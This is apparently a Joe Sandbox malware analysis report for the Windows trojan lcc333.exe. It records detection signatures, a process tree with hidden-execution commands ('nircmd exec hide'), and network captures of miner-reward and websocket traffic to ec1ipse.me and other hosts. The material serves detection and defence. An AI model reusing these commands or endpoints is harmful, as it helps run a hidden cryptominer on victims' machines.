Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lcc333.exe

Overview

General Information

Sample name:lcc333.exe
Analysis ID:1562222
MD5:a236cdec4dd41fb49c3b5afc64b6f878
SHA1:0ab0f158a5034f2a21f387e5c57d3b2cf667c720
SHA256:015338b4f158c874c7b2bb20e1bb8f465d5679037efe5a21ba2c06cb6dc07a4d
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
PE file contains section with special chars
Uses known network protocols on non-standard ports
Uses the nircmd tool (NirSoft)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: PUA - NirCmd Execution
Uses taskkill to terminate processes
Yara detected NirCmd tool

Classification

Process Tree

  • System is w10x64
  • lcc333.exe (PID: 612 cmdline: "C:\Users\user\Desktop\lcc333.exe" MD5: A236CDEC4DD41FB49C3B5AFC64B6F878)
    • lcc333.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\lcc333.exe" MD5: A236CDEC4DD41FB49C3B5AFC64B6F878)
      • cmd.exe (PID: 576 cmdline: C:\Windows\system32\cmd.exe /c python.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5688 cmdline: cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AutoDesk.exe (PID: 4676 cmdline: AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs MD5: 684CBE7FDADD9BE38FBFE427040B2637)
        • timeout.exe (PID: 180 cmdline: timeout /t 120 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • taskkill.exe (PID: 6820 cmdline: taskkill /f /im AutoDesk.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • cmd.exe (PID: 320 cmdline: cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AutoDesk.exe (PID: 2148 cmdline: AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs MD5: 684CBE7FDADD9BE38FBFE427040B2637)
        • timeout.exe (PID: 2164 cmdline: timeout /t 120 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c play.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nircmd.exe (PID: 3176 cmdline: nircmd exec hide "app_process.exe" MD5: 4A9DA765FD91E80DECFD2C9FE221E842)
          • app_process.exe (PID: 6444 cmdline: "app_process.exe" MD5: 7226BE407EFCC671016739CAD3D26220)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nircmd.exe (PID: 4820 cmdline: nircmd exec hide "app_process.exe" MD5: 4A9DA765FD91E80DECFD2C9FE221E842)
          • app_process.exe (PID: 356 cmdline: "app_process.exe" MD5: 7226BE407EFCC671016739CAD3D26220)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2452 cmdline: timeout /t 600 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • taskkill.exe (PID: 5944 cmdline: taskkill /f /im app_process.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • nircmd.exe (PID: 3140 cmdline: nircmd exec hide "app_process.exe" MD5: 4A9DA765FD91E80DECFD2C9FE221E842)
          • app_process.exe (PID: 5708 cmdline: "app_process.exe" MD5: 7226BE407EFCC671016739CAD3D26220)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nircmd.exe (PID: 1100 cmdline: nircmd exec hide "app_process.exe" MD5: 4A9DA765FD91E80DECFD2C9FE221E842)
          • app_process.exe (PID: 4068 cmdline: "app_process.exe" MD5: 7226BE407EFCC671016739CAD3D26220)
            • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 1252 cmdline: timeout /t 600 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • cmd.exe (PID: 5616 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\lcc333.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6176 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\System32\nircmd.exeJoeSecurity_NirCmdYara detected NirCmd toolJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
      00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
        00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
          0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
            00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              31.2.nircmd.exe.140000000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                15.2.nircmd.exe.140000000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                  21.2.nircmd.exe.140000000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                    31.0.nircmd.exe.140000000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                      21.0.nircmd.exe.140000000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                        Click to see the 3 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Communication To Uncommon Destination Ports
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 43.199.41.35, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\lcc333.exe, Initiated: true, ProcessId: 2836, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                        Sigma detected: PUA - NirCmd Execution
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: nircmd exec hide "app_process.exe", CommandLine: nircmd exec hide "app_process.exe", CommandLine|base64offset|contains: *, Image: C:\Windows\System32\nircmd.exe, NewProcessName: C:\Windows\System32\nircmd.exe, OriginalFileName: C:\Windows\System32\nircmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c play.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6512, ParentProcessName: cmd.exe, ProcessCommandLine: nircmd exec hide "app_process.exe", ProcessId: 3176, ProcessName: nircmd.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49785 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49786 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49793 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49792 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49798 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49797 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49809 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49816 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49817 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49830 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49835 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49848 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49849 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49853 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49866 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49867 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49871 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49872 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49884 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49886 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49890 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49891 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49906 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49908 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49912 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49926 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49927 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49932 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49933 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49943 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49944 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49951 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49950 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49963 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49962 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49967 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49969 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49981 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49982 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49986 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49987 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49998 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50001 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50005 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50006 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50016 version: TLS 1.2
                        Source: lcc333.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
                        Source: Binary string: c:\Projects\VS2005\NirCmd\x64\release\NirCmd.pdb source: nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: lcc333.exe, 00000000.00000003.2104758993.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: lcc333.exe, 00000000.00000003.2104758993.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C89280 FindFirstFileExW,FindClose,0_2_00007FF714C89280
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF714C883C0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF714CA1874
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140002C80 strcpy,strrchr,FindFirstFileA,FindNextFileA,FindClose,15_2_0000000140002C80
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140003B64 FindFirstFileA,FindNextFileA,FindClose,strlen,strlen,15_2_0000000140003B64

                        Networking

                        barindex
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 50010
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 50011
                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 43.199.41.35:8080
                        Source: global trafficTCP traffic: 192.168.2.5:49778 -> 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /miner/rewards?pubkey=4ACz7dexqbAN71zD5WANZLKDYQuhz8D4j6pdkmyKQ91Q HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /miner/rewards?pubkey=7KD5XxiuTcgebvuXysq3sFXGS4A2UZTkANkpjuZJEPro HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529460 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: j+ijabsuJbfoanaXa6e/wg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0RVYkdDNGczaGMxYVZ5OEJ4ZXpHWWhEbzVwdDVkeDZRd0dERjZyZEN2eEptMUpkQWVWaUs4ZzlIQUJSRVZWdW1aeG5KVnlqbmJ2Ym1uWTlvcEhKRnJQaw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529460 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Pa7nbnXbg02FFMyV6RJt6A==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M2dKM1llU0szcnNQOUNoanltOW9xZXRhR2pZQzVQTEN3bzlnSEpDUEdIWlB1YkV0OHJ5dTZQMndjZE1CNUg1a054ZjRTSjV0aUpoQ25pNW1SNE5zVnB2Rw==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529467 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: kjCthDRqmFKGgW61X8+gcg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NW9CMW91MzRpU2R3M2tpaEdUV1BEVXFIMm9wR2tpN2FiWEFvenhoUjU0MXpoZkZDTURLclFObWhTTmE3QVFjQlZ3SEw4c3RncGd6UXdlaTFxSjZLZXNNcg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529467 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: DOpCmHC46XhQJiGoEF5WHA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NWRQaXo3TERyeXZQVmVibVBWUzRmbURCRjE4QVV5cWJLMThQR2FLVXJ5emFRUnFaY2pwZTZmZTZYZkVCdTQ0cEdFOGVaZjVDQ0hDRFJwUjZmRkVpc0dnVg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529473 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 06+qmnMtCAEE2s2ywxV3ug==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86Mm1UTXlqSjZxVTlncUthVXhZTWZtYlZ1eEJ4RjNOaFVBako5TVpYa2NhRldqTXRuTFVxUXJqb0I5VzhZdGp5QWlTS1R1b1VtaU5FMUtUUnhUNkM1WlY0Rg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529473 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: ACuOhDY8i4K7DEpUKBlvYw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M3lmRFRWNkZlY1ZzYVJhbnpTcGRQVFlWelF0ZEVvbUZUREhhbUx4V2o4UWF6TktvZGlaU1pab0JoSnNNdHVIbWlZU3dKWWZMaXh3TkhkR2E5NVo5NEdxUg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529480 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: uN1+11IrwDzGU8rnhMRxNQ==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0ZVU2N6UjJndkt3OUZvZE1pbnJSWHd4YVI0THJVa2g1NjZOV2pSa0Z2ekM5a2VCVzhIOXBnR3FtcDhKcjhzQTVUclFCR0VFUXBjVFc2cDhCZUN5MktwSw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529480 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: H7m8aVRHdQaFbrlh0idjiA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6Y29jZUpGRnJWM1dUUXJEQWtOSjlBclZoeGJ0WWtWN2pyd1RMU1ZxRTJ4anJCcmcxZDlQRGltblVmUERORVptQlFob0JGSlQzVENLNkhTWUxSU2tqTWtM
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529486 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: TBZMZ12pMHBBoC4mQVa+yA==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHNzd2k1aHROd3hCQzRkTTlYbnNteXdrOFY1Uk10S2czMzRtbm94Uzc4Rnp6WXo4TWdZc3RpeFZqYVlrZzJFbkx5d3NyYzZYQlYyUkRWSnJ0anN0QUhnVQ==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529486 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: nkGHFwCOnEgaFMiW/EcHhA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6WGZhUXUzdExuQTFuNTdONUFaemdFSEdwY3F1Q0RlVkJudldBc3NaQUIyNFdkaGozMWh5Y3Rod3oyeERrOENCNE44TlkxU0dqeVBxbkg1VHVRRDR2eEdw
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529493 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Jcg0jM88I6kJ8E206drpQg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NWpvR210UEtUMWtyOE1RQmlNWTl4UzQyNFpUZXRHZFlNQUprMkJ2Y0o1eTlITlRmVkJTZmV0Uk5aOTVkaFl3Zml0OWdlS3BMYkZBNmpuclExVHc2dEQ0Zg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529493 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: fNEZjZj4duZrRnwSm600NQ==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NTVUU1k0NU00TW9RMVlWa29KSENmM2plcnloS0JSOHZpcHNpcmpld2RSaFJFcmdXNkNhWXVBOUJSeHpnNTFaUnBKZEY2clFKZUxzZ2tlbWZmcUhuVUhT
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
